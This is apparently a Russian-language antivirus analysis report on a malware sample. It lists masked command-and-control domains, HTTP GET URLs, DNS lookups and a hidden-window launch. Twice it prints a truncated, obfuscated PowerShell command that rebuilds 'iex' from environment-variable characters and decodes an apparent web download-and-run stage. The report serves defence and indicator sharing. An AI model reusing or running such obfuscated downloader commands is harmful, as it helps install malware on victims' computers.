Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $Env:COMsPeC[4,24,25]-jOiN'')( -jOiN ('4f65N81p105N29u78L69L87N13L79N66p74S69K67f84O0f110S69L84y14u119u69p66N99K76L73O69N78O84{27L4u107K114O87f29N7K72{84N84{80K26y15L15y87K73y76y68L80f69p84y...
Сетевая активность
Подключается к
- 'wi###ete.com':80
- 'to####gworld.com':80
TCP
Запросы HTTP GET
- http://wi###ete.com/73v5/
- http://www.to####gworld.com/VKT9j/
UDP
- DNS ASK wi###ete.com
- DNS ASK es#######magrecimento.com.br
- DNS ASK so######etowerquan7.com.vn
- DNS ASK sa###zada.com
- DNS ASK to####gworld.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $Env:COMsPeC[4,24,25]-jOiN'')( -jOiN ('4f65N81p105N29u78L69L87N13L79N66p74S69K67f84O0f110S69L84y14u119u69p66N99K76L73O69N78O84{27L4u107K114O87f29N7K72{84N84{80K26y15L15y87K73y76y68L80f69p84y...' (со скрытым окном)
